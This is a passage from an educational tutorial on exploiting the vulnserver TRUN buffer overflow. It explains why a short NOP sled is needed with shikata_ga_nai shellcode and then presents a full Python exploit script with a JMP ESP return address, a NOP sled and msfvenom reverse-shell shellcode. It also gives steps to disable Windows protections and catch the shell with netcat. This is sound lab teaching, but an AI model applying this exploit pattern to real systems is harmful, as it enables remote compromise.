A NOP sled is a concatenation of lots of NOP instructions. Once the CPU hits one it will continue to increase the EIP until a normal instruction occurs. Note that sometimes a NOP sled can also refer to a bunch of instructions that just keep the status quo - such as incrementing and then decrementing a register for example.
{% endhint %}

{% hint style="danger" %}
What's sometimes taught for the `vulnserver` and the `TRUN` command is that "*we must include a NOP sled because we don't know where the shellcode will be in memory*" or something similar. - But as we found out previously, that's not the case. We know exactly where it'll be.
{% endhint %}

If you remember the chapter where we talked about different exploit variants, we drew return addresses that pointed directly into the stack. As I already stated back there, even when ASLR is disabled the stack address might not be entirely deterministic as it could slightly change from system to system or even from "with debugger attached" to "without debugger attached".

In order to defeat this uncertainty, one could then add a NOP sled on the stack before the shellcode and try to aim somewhere in the middle of that with the return address. Thus, as long as the EIP hit the NOP sled *somewhere* it would start to slide along the NOPs until executing the shellcode.

{% hint style="info" %}
If you'd like to see an example for that technique you can check out my write up on the Binex room from TryHackMe [here](https://ccat.gitbook.io/cyber-sec/thm-write-ups/binex#finding-a-return-address).
{% endhint %}

**Anyway**, since we're using the address of the `JMP ESP` we will land *exactly* at the first instruction of our shellcode. So there is no randomness involved. However, if we were to attempt exploitation without a NOP sled we'd still fail.

In order to understand why that is and how big of a NOP sled we need, we'll have to look at the first few instructions of the shellcode. Using an (online) disassembler we can investigate the first couple of bytes that `msfvenom` generated for us:

![Beginning of the disassembled shellcode that was generated previously](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FviDVpdLNutfMomdiNa7V%2Fshellcode-diasassembly.png?alt=media\&token=58b1b4c2-856e-4569-9769-62d84eb9818c)

Although yours might look slightly different, when `msfvenom` used the `shikata_ga_nai` encoder (default) the first few instructions will consist of something like:

```armasm
<some floating point operation>
FNSTENV [ESP-0xC]
```

{% hint style="info" %}
For a detailed explanation for these instructions you can consult [this great article](https://www.boozallen.com/insights/cyber/shellcode/shikata-ga-nai-encoder.html). Here I'll try to focus only on what's important for us.
{% endhint %}

Since shellcode can land anywhere in memory it can not rely on any hardcoded addresses. Therefore, the first thing that this shellcode attempts to do is to get a reference to where it is located via the EIP. The technique of using `FNSTENV` for that purpose is described [here](https://armoredcode.com/blog/backflip-into-the-stack/) and [here](http://phrack.org/issues/62/7.html).

The [`FNSTENV`](https://www.felixcloutier.com/x86/fstenv:fnstenv) instruction basically loads the 28 bytes large floating point environment structure to the specified address. By loading the structure to the offset `ESP - 0xc` (dec: -12) it aligns on the stack in such a way that the value holding the current EIP content is placed at the address the ESP currently points to. This way, the next `pop` instruction will load the current EIP value to the specified register (`ebx` in our example).

Because our `FNSTENV` instruction is placed 7 bytes (see the offset in the disassembly) after where the ESP points to during runtime of our exploit - when the instruction causes to overwrite 12 bytes below the ESP and then 16 more bytes starting from the ESP it simply overwrites a part of the shellcode that wasn't even executed yet. To be precise, 7 bytes of already executed shellcode + 4 bytes of the `FNSTENV` instruction itself and then (16-7-4=) 5 bytes of shellcode that weren't executed yet.

And finally, this is the real reason for the necessary NOP sled. We must avoid the shellcode overwriting itself which we can achieve by prepending it with (at least) 5 NOP bytes.

{% hint style="info" %}
On a final note, you'll likely never make the effort of calculating the exact amount of necessary NOP bytes ever again if you can just use a generic 32-byte NOP sled.\
\
However, this chapter was to demonstrate that there is absolutely nothing mysterious or random about this buffer overflow. So next time someone tells you that you have to use a NOP sled "***because you have to***" - you now know a bit more.
{% endhint %}

### Exploiting the Target

Finally, we've made it all the way to the actual exploit writing. Up until now we didn't have to write a single line of code to understand how to exploit this particular buffer overflow.

{% hint style="info" %}
For this part I'm going to use `python3` but you can attempt to use any language that you feel comfortable with. [Some people even use PowerShell...](https://benheater.com/powershell-win-x86-stack-bof-dev/) (While I don't agree with some of the technical representations, the PowerShell solution *is* amazing.)
{% endhint %}

Basically, we just have to combine the different pieces that we collected throughout the chapters:

1. The buffer must start with `TRUN .`
2. After 2012 bytes we start overwriting the RIP value, so we can create the necessary padding with: `b"TRUN ."` (6 bytes) + `b"A"*(2012-6)`
3. For the return address we chose 0x625011AF
4. Following the return address comes the NOP sled: `b"\x90"*5`&#x20;
5. At the end comes the shellcode that we generated with `msfvenom`

{% hint style="info" %}
When using `python3` the `socket.send()` method requires a byte string. Thus, all strings will be prepended with a `b`. Alternatively, we could use `"string".encode('latin1')` for every string`.`
{% endhint %}

There is one final thing to note. We know that we must place the address `0x625011AF` on the stack. But as previously explained the values on the stack are stored in little endian format. So if we want to create the value `0x625011AF` we actually have to write the single bytes in reversed order to the stack. Therefore, to create that address on the the stack we must write the bytes `0xAF 0x11 0x50 0x62`.

Stitching all of what we've gathered together in a single script, we get the following.

```python
#!/usr/bin/env python3

# import socket library for connection to the server
import socket

# Shellcode created with msfvenom
buf  = b"\xb8\xdf\xf1\x63\x55\xda\xde\xd9\x74\x24\xf4\x5b\x31"
# CLIPPED FOR BREVITY
buf += b"\xaf\x67\x70\x1c\x77\x94\x08\x0d\x12\x9a\xbf\x2e\x37"
shellcode = buf

# Create a TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Use the socket to connect to the target vulnserver
s.connect(('10.0.2.9',9999))

# Use the starting bytes "TRUN ." to trigger the call to Function3
trigger_command = b'TRUN .'

# Create a padding that will fill the assigned buffer and overwrite the EBP
padding = b'A'*(2012 - len(trigger_command)) 

# Little endian representation of the address to the JMP ESP instruction
# This will overwrite the return instruction pointer (which will be loaded
# into the EIP register)
overwrite_rip = b'\xAF\x11\x50\x62'

# A NOP sled to avoid the shellcode overwriting itself
nop_sled = b'\x90'*5

# Combine all the pieces to form the payload
payload = trigger_command + padding + overwrite_rip + nop_sled + shellcode

# Send the payload to the vulnserver
s.send(payload)
```

And that's it, we're done. Let's test that exploit.

{% hint style="info" %}
A small reminder if you've been following along with a Windows 11 target. In order for this exploit to work, you must disable the **Mandatory ASLR** option under "App & browser control" > "Exploit protection settings" - restart the virtual machine and then also disable **Real-time protection** under "Virus & threat protection settings".
{% endhint %}

Open a simple netcat listener with `nc -nlvp 80`, make the script executable with `chmod +x exploit.py` and finally run it.

![Triggering the reverse shell](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FZ2YfiIdQ4E0Tt3oEQ2xf%2Freverse-shell.png?alt=media\&token=cb7530a2-5f5e-4c24-a29a-a6a918ed614e)

{% hint style="success" %}
We successfully triggered the reverse shell.
{% endhint %}

## Final Notes

We've tried to trace the entire process all the way from locating the vulnerable entry point up to successfully spawning a reverse shell - writing and firing only a single exploit script.

It's pretty much obvious that this method quickly becomes very tedious and far more difficult once the target application gets more complex. Using the tools and methodologies shown in the more practical tutorials is definitely recommended and sufficient for most challenges you'll encounter in CTFs for example.

However, I hope that you were able to gain at least something out of *whatever this here ended up being* and do now have a deeper understanding of the basic buffer overflow. Or maybe you were just equally as curious and can now sleep a tiny bit better.

Either way, I'm gladly **taking feedback** on any of the above. You can find me over at TCMs discord and drop me a message anytime (I trust that you can find me) - or if you'd rather be subtle feel free to smash one of those smiley faces.

#### Practical Buffer Overflow Introductions

If you want to follow a more practical and user friendly introduction - you can try one of these:

* [TheCyberMentor - Buffer Overflows Made Easy](https://www.youtube.com/watch?v=ncBblM920jw)
* [John Hammond - Basic Buffer Overflow](https://youtu.be/yJF0YPd8lDw)

#### Acknowledgements

Huge ***thanks*** to my proof-readers and @TCM Security for the great support.

{% embed url="<https://app.diagrams.net/>" %}
All diagrams were made with the free online platform diagrams.net.
{% endembed %}
